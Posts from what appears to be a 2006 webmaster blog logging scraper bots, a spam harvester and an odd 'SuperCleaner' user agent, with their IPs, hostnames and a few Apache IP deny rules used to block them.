It often came in with refers that tracked back to its scraper site.
134.96.1.195 answerbus.com answerbus.de uni-saarland.de

All of these websites have the same thing on them. It looks like a search system and even says "supported by research grants from .....". I don't know if that's true; if it is, they should ask for the money back. Unless they support scrapers?

I tested this search system using my keywords for my sites and what I found were listings with my text and site name that looked like they were links to my site, but when clicking on them I was taken to other scraper linking sites.

This thing is banned by domain and user agent.


Update: bot getting very active; suggest adding to server IP ban

deny from 134.96.104.226
deny from 134.96.104.221
deny from 134.96.104.220
deny from 134.96.1.195

blogsearchbot-pumpkin-2

blogsearchbot-pumpkin-2 GET HTTP/1.0
85.10.211.195 85-10-211-195.clients.your-server.de

I don't know what pumpkin is but its banned.

They say it doesn't read robots. I don't care; with no idea what it is, it's banned.

Sep 5, 2006

upc-a.chello.nl abuse

wells search ii
62.163.12.132 a12132.upc-a.chello.nl
wells search ii
62.163.32.222 a32222.upc-a.chello.nl
wells search ii
62.194.120.227 h120227.upc-h.chello.nl



Have been seeing a lot of this spam harvester running on chello.nl

Also turned up at chello084112114199.33.11.vie.surfer.at

This is a known spam harvester.

SuperCleaner 2.84

What is useragent
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?
24.147.48.201 c-24-147-48-201.hsd1.ma.comcast.net


Bad Behavior is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.

Welcome

Welcome to the new blog. I had to move from the forum over to here because of all the attempts to hack the forum software.

All the old posts from the forum had to be purged so I could get them out of the Google index.

I will attempt to repost the major ones here.